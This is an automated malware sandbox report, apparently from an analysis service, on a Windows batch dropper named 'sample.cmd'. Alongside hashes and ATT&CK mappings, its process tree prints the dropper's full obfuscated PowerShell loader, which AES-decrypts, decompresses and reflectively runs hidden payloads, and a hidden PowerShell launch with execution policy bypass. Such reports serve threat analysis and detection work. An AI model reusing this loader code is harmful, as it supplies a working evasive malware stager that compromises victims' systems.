Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 16:40

General

  • Target

    sample.cmd

  • Size

    111KB

  • MD5

    934330a37a7b1380047366d135ff1423

  • SHA1

    1cadd58c7e7475277d23b924b3dac8aad567bf44

  • SHA256

    c2ab16802765ebcfe21f21aabd351c846bbea9140835c23579f9d0e26f9bdf2c

  • SHA512

    844b523cb12393b97a9807fd4b5bd9b811a7482a4d9865a0b3c7ccdce889222671f86bd87cc8a0ec25abefe62d8e33a871434114847fea58bf8bc73bc411362a

  • SSDEEP

    3072:/HPsUJ1lTMxqWITymQ57Leimw/gU0x1DzfsxciNpU3:XTWITymEeiWUxFy

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\sample.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2740
    • C:\Windows\system32\cmd.exe
      cmd /c "set __=^&rem"
      2⤵
        PID:2384
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lqGtFYajP4dvsKIWnOQi409E1v8ult6DFNGJrf47kZE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x2DBEVvQmBOCho9gd+n1bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oKEyn=New-Object System.IO.MemoryStream(,$param_var); $ZXvXs=New-Object System.IO.MemoryStream; $rdMmY=New-Object System.IO.Compression.GZipStream($oKEyn, [IO.Compression.CompressionMode]::Decompress); $rdMmY.CopyTo($ZXvXs); $rdMmY.Dispose(); $oKEyn.Dispose(); $ZXvXs.Dispose(); $ZXvXs.ToArray();}function execute_function($param_var,$param2_var){ $pUJev=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oJbpm=$pUJev.EntryPoint; $oJbpm.Invoke($null, $param2_var);}$XSGCc = 'C:\Users\Admin\AppData\Local\Temp\sample.cmd';$host.UI.RawUI.WindowTitle = $XSGCc;$WmqwT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XSGCc).Split([Environment]::NewLine);foreach ($VEuit in $WmqwT) { if ($VEuit.StartsWith('kJooVBlfXESpuyhzrHrv')) { $iEGsi=$VEuit.Substring(20); break; }}$payloads_var=[string[]]$iEGsi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        2⤵
          PID:1980
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2192

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2192-4-0x000007FEF565E000-0x000007FEF565F000-memory.dmp
        Filesize

        4KB

      • memory/2192-7-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp
        Filesize

        9.6MB

      • memory/2192-6-0x0000000001E20000-0x0000000001E28000-memory.dmp
        Filesize

        32KB

      • memory/2192-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp
        Filesize

        2.9MB

      • memory/2192-8-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp
        Filesize

        9.6MB

      • memory/2192-9-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp
        Filesize

        9.6MB

      • memory/2192-10-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp
        Filesize

        9.6MB

      • memory/2192-11-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp
        Filesize

        9.6MB

      • memory/2192-12-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp
        Filesize

        9.6MB